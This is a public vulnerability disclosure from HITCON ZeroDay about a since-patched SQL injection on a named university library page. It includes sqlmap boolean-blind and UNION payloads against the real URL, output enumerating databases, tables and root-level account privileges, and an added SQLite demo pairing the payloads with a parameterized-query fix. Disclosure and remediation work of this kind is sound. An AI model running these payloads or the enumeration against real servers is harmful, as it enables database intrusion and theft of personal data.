SQL injection with root privileges on a National Kaohsiung University of Science and Technology site - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00341
  • Vendor: 高雄應用科技大學
  • Title: SQL injection with root privileges on a National Kaohsiung University of Science and Technology site
  • Introduction: SQL injection with root privileges on the library site of the Jiangong-Yanchao campus of National Kaohsiung University of Science and Technology

Processing Status

Current status: Public
Last Update: 2018/04/25

Workflow stages:
  • New submission
  • Reviewed
  • Reported to vendor
  • Patched
  • Not retested
  • Public

Processing History

  • 2018/04/01 02:14:01 : New submission (status updated by Cra5h)
  • 2018/04/01 15:41:37 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/02 12:03:17 : Patching in progress (status updated by the HITCON ZeroDay service team)
  • 2018/04/02 12:03:18 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/02 12:03:18 : Patching in progress (status updated by the HITCON ZeroDay service team)
  • 2018/04/17 17:29:51 : Patched (status updated by the organization account)
  • 2018/04/25 03:00:25 : Public (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2018-00341
  • Reporter: cra5h (Cra5h)
  • Risk: High
  • Type: SQL Injection (資料庫注入攻擊)

References

An attacker can exploit this vulnerability to gain access to the back-end database and its full contents (including large amounts of user personal data or other sensitive data), and may also be able to destroy or modify that data.

Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(This field is generated automatically by the system from the vulnerability category and is provided as reference material.)

Related URL

http://www.lib.kuas.edu.tw/portal_people.php?id=2

Description

SQL injection with root privileges on the library site of the Jiangong-Yanchao campus of National Kaohsiung University of Science and Technology
Injection point:
http://www.lib.kuas.edu.tw/portal_people.php?id=2
The id parameter is not properly filtered, which allows SQL injection.
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 37 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 5546=5546

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x53647462436b626368474c7074675a796e4357446d6a6b75754764714270535a536e657057577255,0x717a7a6271),NULL,NULL,NULL-- neia

[01:58:51] [INFO] testing MySQL
[01:58:53] [INFO] confirming MySQL
[01:58:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.30, Apache 2.2.34
back-end DBMS: MySQL >= 5.0.0
[01:58:56] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.lib.kuas.edu.tw'

Confirming the affected databases (11 in total):
[01:59:17] [INFO] fetching database names
[01:59:18] [INFO] used SQL query returns 11 entries
[01:59:19] [INFO] retrieved: information_schema
[01:59:20] [INFO] retrieved: RAMS2013
[01:59:21] [INFO] retrieved: fb5
[01:59:22] [INFO] retrieved: fb5_20171102
[01:59:23] [INFO] retrieved: kuas
[01:59:24] [INFO] retrieved: kuas_old
[01:59:25] [INFO] retrieved: kuasspace
[01:59:27] [INFO] retrieved: mysql
[01:59:28] [INFO] retrieved: performance_schema
[01:59:29] [INFO] retrieved: portal
[01:59:30] [INFO] retrieved: test
available databases [11]:
[*] fb5
[*] fb5_20171102
[*] information_schema
[*] kuas
[*] kuas_old
[*] kuasspace
[*] mysql
[*] performance_schema
[*] portal
[*] RAMS2013
[*] test

[01:59:30] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.lib.kuas.edu.tw'

Checking the data volume (there is too much data and I couldn't be bothered to run it all; the first database alone has 900+ entries, so there is clearly a lot):
[02:00:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[02:00:01] [INFO] fetching database names
[02:00:01] [INFO] used SQL query returns 11 entries
[02:00:01] [INFO] resumed: information_schema
[02:00:01] [INFO] resumed: RAMS2013
[02:00:01] [INFO] resumed: fb5
[02:00:01] [INFO] resumed: fb5_20171102
[02:00:01] [INFO] resumed: kuas
[02:00:01] [INFO] resumed: kuas_old
[02:00:01] [INFO] resumed: kuasspace
[02:00:01] [INFO] resumed: mysql
[02:00:01] [INFO] resumed: performance_schema
[02:00:01] [INFO] resumed: portal
[02:00:01] [INFO] resumed: test
[02:00:02] [INFO] fetching tables for databases: 'RAMS2013, fb5, fb5_20171102, information_schema, kuas, kuas_old, kuasspace, mysql, performance_schema, portal, test'
[02:00:03] [INFO] used SQL query returns 930 entries
[02:00:04] [INFO] retrieved: "information_schema","CHARACTER_SETS"
[02:00:05] [INFO] retrieved: "information_schema","COLLATIONS"
[02:00:06] [INFO] retrieved: "information_schema","COLLATION_CHARACTER_SET_APPLICABILITY"
[02:00:07] [INFO] retrieved: "information_schema","COLUMNS"
[02:00:09] [INFO] retrieved: "information_schema","COLUMN_PRIVILEGES"
[02:00:10] [INFO] retrieved: "information_schema","ENGINES"
[02:00:11] [INFO] retrieved: "information_schema","EVENTS"
[02:00:12] [INFO] retrieved: "information_schema","FILES"
[02:00:13] [INFO] retrieved: "information_schema","GLOBAL_STATUS"
[02:00:14] [INFO] retrieved: "information_schema","GLOBAL_VARIABLES"
[02:00:15] [INFO] retrieved: "information_schema","KEY_COLUMN_USAGE"
[02:00:16] [INFO] retrieved: "information_schema","OPTIMIZER_TRACE"
[02:00:17] [INFO] retrieved: "information_schema","PARAMETERS"
[02:00:18] [INFO] retrieved: "information_schema","PARTITIONS"
[02:00:19] [INFO] retrieved: "information_schema","PLUGINS"
[02:00:20] [INFO] retrieved: "information_schema","PROCESSLIST"
[02:00:21] [INFO] retrieved: "information_schema","PROFILING"
[02:00:22] [INFO] retrieved: "information_schema","REFERENTIAL_CONSTRAINTS"
[02:00:23] [INFO] retrieved: "information_schema","ROUTINES"
[02:00:24] [INFO] retrieved: "information_schema","SCHEMATA"
[02:00:25] [INFO] retrieved: "information_schema","SCHEMA_PRIVILEGES"
[02:00:26] [INFO] retrieved: "information_schema","SESSION_STATUS"
[02:00:27] [INFO] retrieved: "information_schema","SESSION_VARIABLES"
[02:00:28] [INFO] retrieved: "information_schema","STATISTICS"
[02:00:29] [INFO] retrieved: "information_schema","TABLES"
[02:00:30] [INFO] retrieved: "information_schema","TABLESPACES"

[02:00:31] [WARNING] user aborted during enumeration. sqlmap will display partial output

Given the data volume above and the list of databases, I guessed that the injection point runs with root privileges, so I checked.
The output is very detailed:
database management system users privileges:
[*] ''@'localhost' [1]:
privilege: USAGE
[*] ''@'protal' [1]:
privilege: USAGE
[*] 'flysheet'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'kuasspace@2017'@'127.0.0.1' [1]:
privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'protal' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

[02:04:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.lib.kuas.edu.tw'

Remediation Advice

Filtering and parameterization.
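The following is an added example; it is not code from the report, from the reporter, or from the affected site. It reproduces the two techniques sqlmap reported against the id parameter (the boolean-based blind test "id=2 AND 5546=5546" and the 6-column UNION) against an in-memory SQLite stand-in for the MySQL back end, and then shows the fix the remediation advice asks for: validate the type of id and bind it as a query parameter. The people and secrets tables, their columns and all rows are constructed for the demo; the real page's schema is not known from the report.

```python
# Added example (not from the HITCON ZeroDay report or the affected site).
# SQLite stands in for MySQL; table names, columns and rows are made up.
import re
import sqlite3


def setup() -> sqlite3.Connection:
    """Build the stand-in database: a 6-column profile table of the kind the
    vulnerable page queries, plus a table the page was never meant to expose."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE people(id INTEGER, name TEXT, title TEXT,
                            ext TEXT, email TEXT, room TEXT);
        INSERT INTO people VALUES (1, 'Alice', 'Librarian', '101', 'alice@example.edu', 'R1');
        INSERT INTO people VALUES (2, 'Bob',   'Director',  '102', 'bob@example.edu',   'R2');
        CREATE TABLE secrets(id INTEGER, user TEXT, pw_hash TEXT);
        INSERT INTO secrets VALUES (1, 'admin', 'deadbeef0123456789');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, raw_id: str) -> list:
    """The pattern behind 'id parameter is not properly filtered': the raw
    query-string value is spliced into the SQL text, so input becomes syntax."""
    sql = "SELECT id, name, title, ext, email, room FROM people WHERE id=" + raw_id
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, raw_id: str) -> list:
    """Fix: accept only an ASCII integer, then pass it as a bound parameter.
    The driver sends the value as data; it can never be parsed as SQL."""
    if re.fullmatch(r"[0-9]+", raw_id) is None:
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, name, title, ext, email, room FROM people WHERE id=?"
    return con.execute(sql, (int(raw_id),)).fetchall()


def demo() -> dict:
    """Run each payload against both lookups and collect the results."""
    con = setup()
    out = {}

    # Boolean-based blind (sqlmap: "id=2 AND 5546=5546"): the response differs
    # between a true and a false condition, which is the only oracle sqlmap
    # needs to extract database names one character at a time.
    out["blind_true"] = lookup_vulnerable(con, "2 AND 5546=5546")
    out["blind_false"] = lookup_vulnerable(con, "2 AND 5546=5547")

    # UNION (sqlmap: "Generic UNION query (NULL) - 6 columns"): six NULLs match
    # the original SELECT's column count, and the third column carries data
    # from another table. sqlmap's real payload puts a CONCAT(0x..) marker
    # there; SQLite has no CONCAT, so a subquery is used instead.
    union = ("2 UNION ALL SELECT NULL, NULL, "
             "(SELECT pw_hash FROM secrets WHERE user='admin'), "
             "NULL, NULL, NULL-- ")
    out["union"] = lookup_vulnerable(con, union)

    # The same payloads against the fixed lookup never reach the database.
    out["safe_ok"] = lookup_safe(con, "2")
    rejected = 0
    for payload in ("2 AND 5546=5546", union, "2-- ", "-1"):
        try:
            lookup_safe(con, payload)
        except ValueError:
            rejected += 1
    out["safe_rejected"] = rejected
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the real application (PHP 5.6 on MySQL, per the sqlmap fingerprint) the equivalent fix is a PDO or mysqli prepared statement with the id bound as an integer; a cast alone without binding still leaves any other string parameter exposed. The privilege dump above also shows that every administrator-level account on that server holds FILE, SUPER and SHUTDOWN, so a successful injection inherits far more than read access if the web front end connects as one of them. Running `SHOW GRANTS FOR CURRENT_USER();` from the application's own connection shows exactly what an injection would inherit; the front end should instead use an account granted only SELECT on the schemas it serves (for example `GRANT SELECT ON portal.* TO 'portal_web'@'localhost';`, where portal_web is a hypothetical account name).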
